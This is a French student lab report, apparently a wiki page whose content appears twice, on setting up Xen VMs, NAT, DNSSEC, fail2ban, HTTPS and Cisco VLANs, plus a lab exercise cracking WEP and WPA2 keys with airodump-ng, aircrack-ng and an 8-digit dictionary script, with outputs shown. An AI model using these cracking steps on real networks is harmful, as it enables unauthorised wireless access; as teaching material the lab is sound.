xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>

accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-12T15:27:57Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

=== Infos concernant notre binôme : ===
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
